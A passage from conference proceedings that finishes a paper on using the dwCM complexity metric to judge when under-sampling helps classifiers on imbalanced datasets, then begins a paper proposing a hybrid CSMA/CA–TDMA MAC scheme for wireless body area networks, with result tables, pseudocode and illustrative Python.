However, the existing complexity metrics do not work well for imbalanced datasets. In [19], the authors proposed the complexity metrics wCM and dwCM for imbalanced datasets. Through a series of experiments, we showed that these metrics help to identify the difficulty level of an imbalanced dataset and are thus useful in deciding whether class-balancing algorithms are required to improve the performance of the base classifiers.
In this paper, we use the dwCM complexity metric to inspect the association between the poor efficacy of classifiers and the intrinsic features of a dataset. Our contributions are: (a) estimating the difficulty level of imbalanced datasets using dwCM, and (b) exploring the competence of different under-sampling algorithms in dealing with the internal data factors. In order to study the impact of dataset complexity on the performance of classifiers with under-sampling pre-processing methods, we grouped the datasets on the basis of the dwCM complexity metric. We chose five dwCM ranges for our comparisons, defined as dwCM ≤ 20%, 21% ≤ dwCM ≤ 30%, 31% ≤ dwCM ≤ 40%, 41% ≤ dwCM ≤ 50%, and dwCM > 50%.
The rest of the paper is organized as follows. Section 2 presents the related works
for data complexity metrics. Section 3 explains the proposed work for this paper.
Section 4 discusses the experimental study and the results obtained for the under-
sampling techniques applied on different groups of datasets. Section 5 provides the
conclusion of this paper.

2 Related Works

The data complexity metrics quantify particular aspects of a dataset, which helps
in selecting the appropriate classification algorithm. Basu and Ho [10] studied the
relationship between the overall classification performance and the intrinsic char-
acteristics of data and they proposed the taxonomy of the data complexity metrics,
which served as keystone for categorizing the data mining problems. Several other
studies [20, 21] have investigated the use of these metrics to analyze the classification
problems.
On the other hand, most studies [16–18, 22–25] have shown that the existing data complexity metrics perform poorly in imbalanced scenarios. Moreover, some metrics have recently been proposed [16, 19, 22, 24, 25] for assessing the complexity of imbalanced datasets. A scatter-matrix-based class separability complexity metric for imbalanced datasets was proposed by Xing et al. [24]. Another metric for imbalanced datasets, based on a k-nn approach, was given by Anwar et al.

[16]. Further, Fernandez et al., [17] suggested a method based on feature selec-
tion and instance selection, to overcome class overlap and class imbalance. Diez-
Pastor et al. [26] used them to predict data complexity intervals for which some
diversity-enhancing techniques may improve the results of an ensemble method.
Barella et al., [22] presented three complexity metrics, adapted from the famous
complexity metrics, for imbalanced datasets by regarding each class individually.

3 Proposed Work

In this paper, we study the relationship between the dwCM complexity metric and the behavior of classifiers with and without under-sampling-based pre-processing methods. In order to study the impact of dataset complexity on the performance of classifiers, we grouped the datasets on the basis of the dwCM complexity metric value (we used the datasets and dwCM metric values calculated in [19]). Based on the previously computed values of the dwCM metric, the different dwCM ranges considered in this paper are defined as: dwCM ≤ 20% (not complex), 21% ≤ dwCM ≤ 30% (very less complex), 31% ≤ dwCM ≤ 40% (less complex), 41% ≤ dwCM ≤ 50% (complex), and dwCM > 50% (highly complex).
In this study, we consider four different base classifiers to evaluate dataset complexity: k-nearest neighbor (k-nn) with k = 3, classification tree (CT), support vector machine (SVM) with a linear kernel, and logistic regression (LR). All four classifiers are executed using the Matlab Classification Learner app. The under-sampling algorithms used in this paper are Tomek links (Tk-Links) [27], condensed nearest neighbor (CNN) [28], one-sided selection (OSS) [29], and neighborhood cleaning rule (NCL) [30]. In order to study the effect of these under-sampling algorithms and to measure the performance of the classifiers for the different dataset groups, we use the sensitivity measure, because it provides information about the correct classification of the minority class. We also use the specificity measure to compute the accuracy for the majority class and the accuracy measure for the overall accuracy of the classifiers.
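The classifiers in this study were run in Matlab's Classification Learner; as an illustrative, non-authoritative sketch of the same workflow in Python, the code below uses scikit-learn classifiers and the imbalanced-learn implementations of the four under-sampling methods, with the dwCM values assumed to be precomputed as in the paper. The label convention (minority class = 1) and the helper names are assumptions. Placing the sampler inside the cross-validation pipeline is one common way to apply under-sampling only to the training folds.

```python
import numpy as np
from sklearn.model_selection import cross_validate
from sklearn.metrics import make_scorer, recall_score
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from imblearn.under_sampling import (TomekLinks, CondensedNearestNeighbour,
                                     OneSidedSelection, NeighbourhoodCleaningRule)
from imblearn.pipeline import Pipeline


def dwcm_group(dwcm_percent):
    """Map a precomputed dwCM value (in %) to the five complexity bins used here."""
    for upper, name in [(20, "not complex"), (30, "very less complex"),
                        (40, "less complex"), (50, "complex")]:
        if dwcm_percent <= upper:
            return name
    return "highly complex"


classifiers = {"k-nn": KNeighborsClassifier(n_neighbors=3),
               "CT": DecisionTreeClassifier(),
               "SVM": SVC(kernel="linear"),
               "LR": LogisticRegression(max_iter=1000)}
samplers = {"Tk-Links": TomekLinks(), "CNN": CondensedNearestNeighbour(),
            "OSS": OneSidedSelection(), "NCL": NeighbourhoodCleaningRule()}

# minority class assumed to be labelled 1, majority class 0 (an assumption)
scoring = {"sensitivity": make_scorer(recall_score, pos_label=1),
           "specificity": make_scorer(recall_score, pos_label=0),
           "accuracy": "accuracy"}


def evaluate(X, y, sampler=None):
    """Fivefold CV; the sampler (if any) is applied to the training folds only."""
    results = {}
    for name, clf in classifiers.items():
        steps = ([("sampler", sampler)] if sampler is not None else []) + [("clf", clf)]
        scores = cross_validate(Pipeline(steps), X, y, cv=5, scoring=scoring)
        results[name] = {m: float(np.mean(scores[f"test_{m}"])) for m in scoring}
    return results
```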

4 Experimental Results

The overall goal of this experimental study is to check the effectiveness of the dwCM complexity metric for imbalanced datasets using different classifiers. In order to assess the performance of the classification algorithms fairly, we performed fivefold cross-validation on the datasets.

Table 1 Experimental results consisting of sensitivity, specificity and accuracy for four classifiers
on the original imbalanced datasets divided into different categories using dwCM complexity metric
Classifier   Dataset groups based on dwCM (%)   Sensitivity   Specificity   Accuracy
k-nn <20 0.9643 (0.035) 0.995 (0.01) 0.9845 (0.02)
20–30 0.73 (0.059) 0.92 (0.09) 0.9045 (0.11)
31–40 0.577 (0.11) 0.9525 (0.069) 0.86475 (0.073)
41–50 0.5563 (0.048) 0.9451 (0.074) 0.901 (0.12)
>50 0.2666 (0.12) 0.9226 (0.06) 0.8342 (0.11)
CT <20 0.9262 (0.11) 0.9796 (0.025) 0.96525 (0.05)
20–30 0.6268 (0.003) 0.934 (0.08) 0.8885 (0.134)
31–40 0.6748 (0.16) 0.9048 (0.09) 0.872 (0.11)
41–50 0.5869 (0.07) 0.9468 (0.07) 0.9093 (0.12)
>50 0.2943 (0.24) 0.9079 (0.08) 0.8291 (0.103)
SVM <20 0.9058 (0.12) 0.978 (0.044) 0.9585 (0.06)
20–30 0.6268 (0.003) 0.9028 (0.098) 0.8645 (0.14)
31–40 0.5725 (0.003) 0.9157 (0.098) 0.8465 (0.14)
41–50 0.0388 (0.067) 0.9947 (0.009) 0.913 (0.13)
>50 0.0809 (0.13) 0.9709 (0.04) 0.8419 (0.11)
LR <20 0.9276 (0.107) 0.9691 (0.04) 0.96 (0.05)
20–30 0.6125 (0.018) 0.9201 (0.09) 0.8705 (0.14)
31–40 0.5925 (0.11) 0.9168 (0.08) 0.8525 (0.001)
41–50 0.3703 (0.05) 0.965 (0.063) 0.9037 (0.12)
>50 0.2125 (0.19) 0.9563 (0.04) 0.8431 (0.09)

4.1 Results and Discussion

Table 1 (second column) shows the different complexity groups used in this study;
for every group, the average sensitivity, specificity and accuracy values are reported
along with their standard deviations. As the table shows, for the datasets in the groups
31% ≤ dwCM ≤ 40%, 41% ≤ dwCM ≤ 50% and dwCM > 50%, the sensitivity values
decrease with increasing complexity; for the dwCM > 50% group, the sensitivity falls
below 0.30 for the k-nn, CT and LR classifiers and is worst for the SVM classifier (0.08).
In contrast, for the groups dwCM < 20% and 21% ≤ dwCM ≤ 30%, the sensitivity values
are good (more than 0.90 for all classifiers in the dwCM < 20% group and more than
0.60 for all classifiers in the 21% ≤ dwCM ≤ 30% group) even without applying any
pre-processing algorithm. These results show that the behavior of the classifiers on less
complex datasets is better and more uniform than on the categories of higher complexity:
in the dwCM < 20% group, almost all classifiers seem to be robust to the imbalance problem.

SVM and LR performance degrades rapidly (an increasing difference between sensitivity
and specificity) as complexity increases, which shows that LR and SVM are more sensitive
to the complex and highly complex dataset groups. The classification tree (CT) is generally
more robust than the k-nn classifier on complex imbalanced datasets.
Table 2 shows the experimental results for the classifiers after applying the pre-
processing algorithms NCL, CNN, OSS and Tk-Links. Here, the results are shown
only for the pre-processing algorithm that yields the highest sensitivity value. From
the results, it is apparent that for the groups with high dwCM metric values, the
under-sampling algorithms lead to a compromise between the sensitivity and specificity
values: although they increase the sensitivity, the corresponding specificity suffers
accordingly. This implies that the use of these under-sampling algorithms seriously
compromises the accuracy on the majority class, especially for the datasets in the groups
41% ≤ dwCM ≤ 50% and dwCM > 50%.

5 Conclusion

In this work, we have analyzed the effect of pre-processing imbalanced datasets
by means of the dwCM complexity metric. We have considered four under-sampling
techniques: OSS, CNN, NCL and Tk-Links. We have observed that the imbalance ratio
is not the only factor responsible for the poor performance of classifiers on the minority
class; classifier learning also depends on other dataset factors such as class overlapping,
small disjuncts, noise and borderline examples. We grouped the datasets into different
categories based on the level of complexity of the dataset, measured through the dwCM
metric, and the metric proved useful in identifying the complexity of the datasets. The
datasets in the first two groups (i.e., dwCM < 20% and 21% ≤ dwCM ≤ 30%) show good
sensitivity values for the minority class and thus do not require any pre-processing
technique. However, the datasets in the other three groups show degraded sensitivity
values for the different classifiers, and applying under-sampling techniques to these
complex groups helped improve the learning for the minority class.

Table 2 Experimental results consisting of sensitivity, specificity and accuracy for four classifiers
after applying under-sampling algorithms on the original datasets divided into different categories
using dwCM complexity metric
Classifier  Dataset group based on dwCM (%)  Under-sampling algorithm  Sensitivity  Specificity  Accuracy
k-nn  <20  OSS  0.9775 (0.045)  0.994 (0)  0.9818 (0.028)
k-nn  20–30  OSS  0.905 (0.19)  0.86 (0.14)  0.87 (0.24)
k-nn  31–40  NCL  0.7855 (0.08)  0.8625 (0.09)  0.8255 (0.09)
k-nn  41–50  NCL  0.8723 (0.13)  0.7417 (0.14)  0.8637 (0.15)
k-nn  >50  NCL  0.7411 (0.09)  0.7028 (0.06)  0.584 (0.22)
CT  <20  CNN  0.9775 (0.045)  0.9875 (0.025)  0.9838 (0.03)
CT  20–30  NCL  0.9357 (0.13)  0.9438 (0.11)  0.9405 (0.11)
CT  31–40  OSS  0.7725 (0.18)  0.8897 (0.02)  0.8005 (0.11)
CT  41–50  NCL  0.7567 (0.17)  0.769 (0.11)  0.7643 (0.13)
CT  >50  NCL  0.6856 (0.06)  0.6532 (0.04)  0.6698 (0.04)
SVM  <20  NCL  0.97 (0.045)  0.97 (0.05)  0.9598 (0.063)
SVM  20–30  OSS  0.97 (0.06)  0.843 (0.19)  0.8205 (0.27)
SVM  31–40  NCL  0.7639 (0.096)  0.8797 (0.14)  0.7763 (0.12)
SVM  41–50  NCL  0.812 (0.12)  0.8547 (0.13)  0.7927 (0.13)
SVM  >50  NCL  0.6731 (0.09)  0.6711 (0.13)  0.6494 (0.08)
LR  <20  CNN  0.9775 (0.045)  0.9875 (0.025)  0.9685 (0.063)
LR  20–30  NCL  0.83 (0.24)  0.83 (0.22)  0.775 (0.336)
LR  31–40  Tk-Links  0.7195 (0.13)  0.7943 (0.14)  0.757 (0.12)
LR  41–50  OSS  0.7527 (0.07)  0.7873 (0.13)  0.7693 (0.09)
LR  >50  NCL  0.5989 (0.16)  0.7566 (0.07)  0.6739 (0.07)

References

1. Branco, P., Torgo, L., & Ribeiro, R. P. (2016). A survey of predictive modeling on imbalanced
domains. ACM Computing Surveys, 49(2), 1–50.
2. Gosain A, Saha A, & Singh, D. (2016). Analysis of sampling based classification techniques
to overcome class imbalancing. In Proceedings 3rd international conference on computing for
sustainable global development (INDIACom) (pp. 7320–7326). IEEE.
3. Chawla, N. V., Bowyer, K. W., Hall, L. O., & Kegelmeyer, W. P. (2002). Smote: Synthetic
minority over-sampling technique. The Journal of Artificial Intelligence Research, 16, 321–357.
4. Estabrooks, A., & Jo, T., Japkowicz, N. (2004). A multiple resampling method for learning
from imbalanced data sets. Journal Computational intelligence, 20(1).
5. Gracia, S., & Herrera, F. (2009). Evolutionary undersampling for classification with imbal-
anced datasets: Proposals and taxonomy. Journal Evolutionary computation, 17, 275–306.
6. Anand, R., Mehrotra, K., Mohan, C., & Ranka, S. (1993). An improved algorithm for neural
network classification of imbalanced training sets. IEEE Transactions on Neural Networks, 4, 962–969.
7. Bruzzone, L., & Serpico, S. (1997). Classification of imbalanced remote-sensing data by neural
networks. Pattern Recognition Letters, 18, 1323–1328.
8. Domingos, P. (1999). Metacost: A general method for making classifiers cost sensitive. In
Proceedings of fifth ACM SIGKDD international conference on knowledge discovery and data
mining, KDD ’99 (pp. 155–164). ACM, New York.
9. Zhou, Z.-H., & Liu, X.-Y. (2006). Training cost-sensitive neural networks with methods
addressing the class imbalance problem. IEEE Transactions on Knowledge and Data Engineering,
18, 63–77.
10. Basu, M., & Ho, T.K. (2006). Data complexity in pattern recognition. In Advance information
and knowledge processing. Springer.
11. Bernado-Manshilla, E., & Ho, T. K. (2005). Domain of competence of XCS classifier system
in complexity measurement space. IEEE Transactions on Evolutionary Computation, 9(1),
82–104.
12. Li, Y., Member, S., & Dong, M. (2005). Classificability-based omnivariate decision trees. IEEE
Transactions on Neural Networks, 16(6), 1547–1560.
13. Baumgartner, R., & Somorjai, R. L. (2006). Data complexity assessment in undersampled
classification of high-dimensional biomedical data. Pattern Recognition Letters, 12, 1383–
1389.
14. Yu, H., Ni, J., Xu, S., Qin, B., & Jv, H. (2014). Estimating harmfulness of class imbalance by
scatter matrix based class separability measure. Intelligent Data Analysis, 18, 203–216.
15. Gracia, S., Cano, J. R., Bernado-Mansilla, E., & Herrera, F. (2009). Diagnose of effective
evolutionary prototype selection using an overlapping measure. International Journal of Pattern
Recognition and Artificial Intelligence, 23(8), 2378–2398.
16. Anwar, N., Jones, G., & Ganesh, S. (2014). Measurement of data complexity for classification
problems with unbalanced data. Statistical Analysis and Data Mining, 7(3), 194–211.
17. Fernandez, L.M., Canedo, V.B., & Betanzos, A.A. (2016). Data complexity measures for
analyzing the effect of SMOTE over microarrays. In Proceedings European Symposium on
artificial neural networks, computational intelligence and machine learning (pp. 289–294).
18. Fernandez, L. M., Canedo, V. B., & Betanzos, A. A. (2017). Can classification performance
be predicted by complexity measures? A study using microarray data. International Journal
Knowledge and Information Systems, Springer, 51(3), 1067–1090.
19. Singh, D., Gosain, A., & Saha, A. (2020). Weighted k-nearest neighbor data complexity metrics
for imbalanced datasets. Journal of Statistical Analysis and Data Mining. https://doi.org/10.
1002/sam.11463
20. Jo, T., & Japkowicz, N. (2004). Class imbalances versus small disjuncts. ACM SIGKDD
Explorations Newsletter, 6(1), 40–49.
21. Denil, M., Trappenberg, T.P. (2010). Overlap versus imbalance. In Canadian conference on AI
(pp. 220–231).

22. Barella, V. H., Garcia, L.P.F., De Souto, M.P., Lorena, A.C., & De Carvalho, A. (2018). Data
complexity measures for imbalanced classification tasks. In Proceedings international joint
conference on neural networks (IJCNN) (pp. 1–8). Rio de Janeiro. https://doi.org/10.1109/
IJCNN.2018.8489661
23. Brun, A. L., Britto, A. S., Jr., Oliveira, L. S., Enembreck, F., & Sabourin, R. (2018). A
framework for dynamic classifier selection oriented by the classification problem difficulty. Pattern
Recognition, 76, 175–190.
24. Xing, Y., Cai, H., Cai, Y., Hejlesen, O., & Toft, E. (2013). Preliminary evaluation of
classification complexity measures on imbalanced data. In Proceedings Chinese intelligent automation
conference (pp. 189–196).
25. Yu, H., Ni, J., Xu, S., Qin, B., & Jv, H. (2014). Estimating harmfulness of class imbalance by
scatter matrix based class separability measure. Journal Intelligent Data Analysis, 18, 203–216.
26. Diez-Pastor, J. F., Rodriguez, J. J., Garcia-Osorio, C. I., & Kuncheva, L. I. (2015). Diversity
techniques improve the performance of the best imbalance learning ensembles. Information
Sciences, 325, 98–117.
27. Tomek, I. (1976). Two modifications of CNN. IEEE Transactions on Systems, Man, and
Cybernetics, SMC-6, 769–772.
28. Hart, P.E. (1968). The condensed nearest neighbour rule. IEEE transactions on information
theory IT-14 (pp. 515–516).
29. Kubat, M., & Matwin, S. (1997). Addressing the curse of imbalanced datasets: one sided
sampling. In Proceedings of 14th international conference on machine learning (pp. 179–186).
Nashville, TN.
30. Laurikkala, J. (2001). Improving identification of difficult small classes by balancing class
distribution. Technical Report A-2001-2, University of Tampere.
Enhanced Combined Multiplexing
Algorithm (ECMA) for Wireless Body
Area Network (WBAN)

Poonam Rani, Ankur Dumka, Rishika Yadav, and Vikas Yadav

Abstract A wireless body area network (WBAN) consists of medical sensors attached to or
implanted in the human body that communicate over a wireless medium and collect the
physiological information of the body. The sensors transmit their readings to a coordinator
node, which forwards this information to an external healthcare monitoring system (usually
an electronic healthcare system) through a nearby access point (AP). One of the challenges
in a body area network is to maintain the quality of service (QoS), e.g., throughput and
delay, under the dynamic environment dictated by human mobility. In this paper, we improve
the performance of the MAC protocol in congested wireless networks by combining
carrier-sense multiple access with collision avoidance (CSMA/CA) with time-division
multiple access (TDMA).

P. Rani · R. Yadav (B)


Department of Computer Science and Engineering, Graphic Era Hill University, Dehradun,
Uttarakhand, India
P. Rani
e-mail: prani@gehu.ac.in
A. Dumka
Department of Computer Science and Engineering, Women Institute of Technology, Dehradun,
Uttarakhand, India
V. Yadav
Department of Computer Science and Engineering, ABES Engineering College Ghaziabad,
Ghaziabad, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 93
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_8

Keywords Wireless body area network (WBAN) · Medium access control (MAC) ·
Carrier-sense multiple access with collision avoidance (CSMA/CA) ·
Time-division multiple access (TDMA)

1 Introduction

A WBAN consists of different wearable sensors, which are used to monitor the
vital signs of a human body, and an on-body coordinator. The MAC protocol [1] in
a WBAN defines a set of rules which regulate the activities of the sensing equipment
in the network. The sensing devices are responsible for transmitting and receiving
data packets, sleeping and idling. If the MAC protocol is not designed properly,
it results in energy loss in the wireless body area network devices because of many
conditions, e.g., overhearing, collisions, over-emitting, idling and on–off transitions.
In general, MAC protocols are classified into two categories:
contention-free and contention-based MAC protocols.
In a contention-free MAC protocol, time is divided into frames, which are further
divided into time slots. A time slot is assigned to a device for packet transmission;
the device may transmit packets only in its allotted time slot, and no other device
is permitted to transmit during this time slot. This approach eliminates
the collision problem inherent in the CSMA protocol.
In a contention-based MAC protocol, the shared medium is available to all sensor
devices for data transfer. The performance depends on the channel access
probabilities of all sensor devices in the network.
We propose to blend the strengths of the two algorithms, CSMA/CA and TDMA.
We apply TDMA scheduling to nodes of lower priority and to nodes that have not
transmitted frames for a long period of time; the TDMA schedule is placed in
between the contention phases of the superframe. The remaining nodes follow the
CSMA/CA mechanism, in which a node must perform carrier sensing to make sure
that the channel is free before transmission.

2 Related Works

The BAN is broadly used in applications in the healthcare field. The healthcare field is
very sensitive; therefore, the MAC protocols proposed for a BAN require additional
care. Many MAC protocols have been proposed, and it has been noted that the TDMA [2]
and CSMA mechanisms are the most well known among MAC protocols [3] for a BAN.
TDMA was considered ideal in earlier times, as it gives improved execution in unsaturated
traffic conditions. A sink node can be placed at the waist, with sensors for glucose
level and ECG placed close to the sink node. These nodes carry significant patient data
and must preserve high trustworthiness as far as node failure and

longer lifetime are concerned. The sensors transmit the information sensed from the
environment to the sink via forwarder nodes, which preserves the energy of the nodes and
keeps the network working for longer periods. Based on the cost function, each
individual node decides whether to become a forwarder node or not:

C.F(i) = d(i) ÷ R.E(i) (1)

A node with the minimum cost function is preferred as the forwarder. The forwarder node
aggregates data and forwards it to the sink, and it assigns a TDMA-based time slot
to its descendant nodes; all the successor nodes transmit their data to the forwarder
node in their own scheduled time slots (a small sketch of this selection rule is given at
the end of this section). Fang and Dutkiewicz [4] proposed an energy-efficient MAC
protocol (BodyMAC). It utilizes flexible bandwidth allocation to enhance node energy
efficiency by reducing the probability of packet collisions. BodyMAC is based on a
downlink and uplink method in which the contention-free part of the uplink subframe is
totally collision free. Liu, Yan and Chen [5] proposed a context-aware MAC protocol
using a hybrid of contention-based and TDMA multi-access methods to deal with lossy
channels by adaptively modifying the MAC frame structure; schedule-based and
polling-based techniques are also utilized to manage periodic and emergency traffic
requirements. References [6, 7] proposed TDMA-based MAC protocol designs; 24 nodes
were taken for the simulations. These techniques try to enhance energy utilization with
a TDMA scheme. In the unscheduled wake-up process, all the nodes in the network have
autonomous wake-up plans; since they have no clue about the wake-up plans of other
devices, carrier sensing (CS) is utilized to avoid collisions.
An enhanced MAC protocol [8] was proposed to prolong the network lifetime, with a focus
on end-to-end transmission delay. To improve the lifetime, the authors analyzed different
models and also implemented cross-layer collaboration between the nodes so that the
lifetime can be improved.
The authors of [9] proposed a task-based model in which energy consumption is divided
into five energy-consuming parts (tasks). A framework was prepared in which, based on
the observed requests, every node takes a decision for the next task. Application
efficiency and energy consumption can be traded off with reference to a reward function,
thereby improving the resulting performance; performance can be further improved by
exchanging data among neighboring nodes.
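As a rough, self-contained illustration of the forwarder-selection rule behind Eq. (1), the sketch below computes each node's cost as its distance to the sink divided by its residual energy and picks the minimum. The field names and this reading of d(i) and R.E(i) are our assumptions for illustration, not definitions taken from the cited work.

from dataclasses import dataclass

@dataclass
class Node:
    node_id: int
    distance_to_sink: float   # assumed meaning of d(i)
    residual_energy: float    # assumed meaning of R.E(i)

def cost(n: Node) -> float:
    # Eq. (1): C.F(i) = d(i) / R.E(i)
    return n.distance_to_sink / n.residual_energy

def select_forwarder(nodes):
    # The node with the minimum cost function is preferred as the forwarder.
    return min(nodes, key=cost)

# Example: node 2 is close to the sink and still has plenty of energy, so it forwards.
nodes = [Node(1, 8.0, 0.4), Node(2, 5.0, 0.9), Node(3, 6.0, 0.5)]
print(select_forwarder(nodes).node_id)   # -> 2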

3 Proposed Model

The MAC protocol in a WBAN defines the set of rules that controls the behavior
of the sensor devices in the network. Transmitting packets, receiving packets, idling
and sleeping are the main activities of a sensor device. If the MAC protocol is not
designed well, energy is wasted through, e.g., collisions, overhearing, idling,
over-emitting and on–off transitions. The quality-of-service attributes are vital for a
high-quality MAC protocol in a WBAN. Since a large amount of energy is required to
transmit data over the wireless medium, and the communication requirement is fulfilled
by the MAC protocol, it is important to implement it carefully for the network. Poor
throughput and energy wastefulness make CSMA/CA less suitable for a WBAN. On the
other hand, the advantage of TDMA is that it is collision free because its slots are
fixed, but it suffers from one major drawback, namely scalability. That is the reason
we have combined the properties of both CSMA/CA and TDMA to improve the MAC protocol
performance: in the superframe, the TDMA schedule is placed in between the contention
phases for the nodes that have been idle for the longest time, while the remaining nodes
follow the CSMA/CA protocol. Which channel access mechanism (CSMA/CA or TDMA) a node
uses is decided by our proposed algorithm, which further increases the quality of
service. A beacon is sent by the coordinator in every beacon period (superframe). In
contended allocations, communication is started by nodes in the sequence EAP1, RAP1,
up to n EAPs and n RAPs, respectively (Fig. 1).

Fig. 1 Beacon period access phases

4 Proposed Transmission Scheme Algorithm

Let n denote the number of sensor nodes and di the delay of node i, where i = 1, …, n.
The average delay of each node is computed in the first round and updated for the same
node in the second round; the procedure continues until the node's delay converges, and
is repeated for the given number of nodes.
Nodes of the same priority are grouped, and the average delay of each priority group is
calculated. The average delay di of every node is then compared with the average delay
of its priority group. If a node's average delay is less than the group average, CSMA/CA
is allocated to that node; if a node's average delay is greater than or equal to the
group average, TDMA is allocated to that node.

Algorithm 1 Proposed Algorithm


1. procedure CAP_CFP(a = number of sensor nodes, k = number of rounds, 0 ≤ β ≤ 1)
2.   for i = 1 to a do
3.     for j = 1 to k do
4.       delay_new = β * delay_old + (1 − β) * delay_new
5.     end for
6.     av_delay_nod[i] = delay_new
7.   end for
8.   for hp = 1 to 7 do
9.     s = 0; c = 0
10.    for i = 1 to a do
11.      if nod[i].priority == hp then
12.        s = s + av_delay_nod[i]
13.        c = c + 1
14.      end if
15.    end for
16.    ag_wait_tim[hp] = s / c
17.    for i = 1 to a do
18.      if nod[i].priority == hp then
19.        if ag_wait_tim[hp] <= av_delay_nod[i] then
20.          allocate TDMA to nod[i]
21.        else
22.          allocate CSMA/CA to nod[i]
23.        end if
24.      end if
25.    end for
26.  end for
27. end procedure
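For clarity, the following is a minimal executable Python transcription of Algorithm 1 under the same assumptions (priority levels 1–7, an exponentially smoothed per-node delay with factor β, and the per-priority-group average delay used as the threshold); the data layout and function names are illustrative only.

def smoothed_delay(delay_samples, beta=0.8):
    # Exponentially smoothed delay over the k rounds (step 4 of Algorithm 1).
    avg = delay_samples[0]
    for d in delay_samples[1:]:
        avg = beta * avg + (1 - beta) * d
    return avg

def allocate_channel_access(nodes, beta=0.8):
    # nodes: list of dicts with 'priority' (1..7) and 'delays' (per-round delay samples).
    # Returns {node index: 'TDMA' or 'CSMA/CA'}.
    avg_delay = [smoothed_delay(n['delays'], beta) for n in nodes]
    allocation = {}
    for hp in range(1, 8):
        members = [i for i, n in enumerate(nodes) if n['priority'] == hp]
        if not members:
            continue
        group_avg = sum(avg_delay[i] for i in members) / len(members)
        for i in members:
            # Nodes that have waited at least as long as their group's average get TDMA
            # slots; the remaining nodes contend with CSMA/CA.
            allocation[i] = 'TDMA' if avg_delay[i] >= group_avg else 'CSMA/CA'
    return allocation

# Example with four nodes in two priority groups.
nodes = [{'priority': 1, 'delays': [2.0, 2.2, 2.1]},
         {'priority': 1, 'delays': [5.0, 5.5, 5.2]},
         {'priority': 2, 'delays': [1.0, 1.1, 0.9]},
         {'priority': 2, 'delays': [0.5, 0.4, 0.6]}]
print(allocate_channel_access(nodes))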

5 Proposed Transmission Scheme Flowchart

GTS (guaranteed time slots) are announced in the beacon frame at the start of every
superframe by the coordinator. If a node's average delay is less than the average delay
of its priority group, CSMA/CA is allocated to that node; if its average delay is greater
than or equal to the group average, TDMA is allocated; otherwise CSMA/CA is used during
the CAP for transmitting the data.
A node that has been assigned GTS slots remains idle during the CAP and sends its data
packets in the CFP period; otherwise its transmission takes place in the CAP period.
After transmitting during its assigned GTS slot, a node waits for the successive beacon
frames. A sensor node remains in the idle state after dispatching its packet in the CAP
if no extra packets are in the buffer to send; otherwise CSMA/CA is started again. If the
CAP length is not sufficient for the transmission of the packets, or the CAP of a given
superframe has ended, the node's transmission is deferred. The detailed method, i.e., how
CSMA/CA and TDMA operate once a node has been assigned its channel access mechanism, is
shown in Fig. 2.

Fig. 2 Proposed transmission scheme flowchart



6 Experiments and Results

In this section, the performance of the CSMA/CA mechanism and our proposed model is
analyzed using IEEE 802.15.6 standard [10] parameters and conditions. The main goal of
this paper is to enhance the quality of service in wireless body area networks so that
the amount of energy consumed by the WBAN is minimized. Which sensor node is assigned
TDMA and which CSMA/CA is decided by our proposed model, which further increases the
performance of the WBAN. MATLAB simulation is used for generating the results.
To obtain the average delay, we simulate our algorithm 30 times for 10 nodes, as shown
in Fig. 3. The results show that for our proposed model the delay is minimized only for
some of the nodes, while for the remaining nodes the delay increases. Each time we run
the simulator, the allotment of CSMA/CA and TDMA slots to the nodes is different. To
obtain the average delay for 20 nodes, we likewise simulate our algorithm 30 times, as
shown in Fig. 4; again, the delay of the proposed model is minimized for some nodes only,
while for the rest it increases. As shown in Fig. 4, CSMA/CA is allocated to nodes 2, 3,
4, 6, 7, 8, 10, 14, 15, 17, 19 and 20, since the delay of the proposed model for these
nodes is larger than the CSMA delay. In contrast, TDMA is allocated to nodes 5, 9, 11,
12, 13, 16 and 18, for which the delay of the proposed model is less than the CSMA delay.
This is not a major problem because, in practical WBAN applications, only a small number
of sensor nodes are placed on the body, so the number of devices mounted on the body is
relatively very small.

Fig. 3 Average delay of nodes for n = 10

Fig. 4 Average delay of nodes for n = 20

7 Conclusion

In this paper, we have studied the different multiple-access techniques of MAC protocols
that are exploited in wireless body area networks. MATLAB simulation is used to compare
CSMA/CA and our proposed model, with the average delay evaluated against the number of
nodes. The simulation results show that increasing the number of sensor nodes does not
have a great effect on the average delay. Moreover, this is not a major problem because,
in practical WBAN applications, only a small number of sensor nodes are placed on the
body, so the number of devices mounted on the body is relatively very small.

References

1. Mahapatro, J., Misra, S., Manjunatha, M., & Islam, N., (2012, Dec). Interference-aware channel
switching for use in WBAN with human-sensor interface. In 2012 4th International Conference
on Intelligent Human Computer Interaction (IHCI) (pp. 1–5). IEEE.
2. Toumanari, A., & Latif, R. (2014, April). Performance analysis of IEEE 802.15.6 and IEEE
802.15.4 for wireless body sensor networks. In 2014 International Conference on Multimedia
Computing and Systems (ICMCS) (pp. 910–915). IEEE.
3. Latré, B., Braem, B., Moerman, I., Blondia, C., & Demeester, P. (2011). A survey on wireless
body area networks. Wireless Networks, 17(1), 1–18.

4. Fang, G., & Dutkiewicz, E. (2009, Sept). BodyMAC: Interference mitigation between WBAN
equipped patients. In ISCIT 2009 9th International Symposium on Communications and
Information Technology (pp. 1455–1459). IEEE.
5. Liu, B., Yan, Z., & Chen, C. W. (2011, June). CA-MAC: A hybrid context-aware MAC
protocol for wireless body area networks. In 2011 13th IEEE International Conference on
e-Health Networking Applications and Services (Healthcom) (pp. 213–216). IEEE.
6. Shrestha, B., Hossain, E., & Choi, K. W. (2014). Distributed and centralized hybrid
CSMA/CA-TDMA schemes for single-hop wireless networks. IEEE Transactions on Wireless
Communications, 13(7), 4050–4065.
7. Fang, G., & Dutkiewicz, E. (2009, Sept). BodyMAC: Energy efficient TDMA-based MAC
protocol for wireless body area networks. In ISCIT 2009 9th International Symposium on
Communications and Information Technology (pp. 1455–1459). IEEE.
8. Alrabea, A., Alzubi, O., & Alzubi, J. (2020). An enhanced MAC protocol design to prolong
sensor network lifetime. International Journal on Communications Antenna and Propagation, 10.
https://doi.org/10.15866/irecap.v10i1.17467
9. Alrabea, A., Alzubi, O. A., & Alzubi, J. A. (2019). A task-based model for minimizing energy
consumption in WSNs. Energy Systems, 1–18.
10. Bhatia, A., & Patro, R. K. (2014). Emergency handling in MICS based body area network. In 2014
IEEE International Conference on Electronics, Computing and Communication Technologies
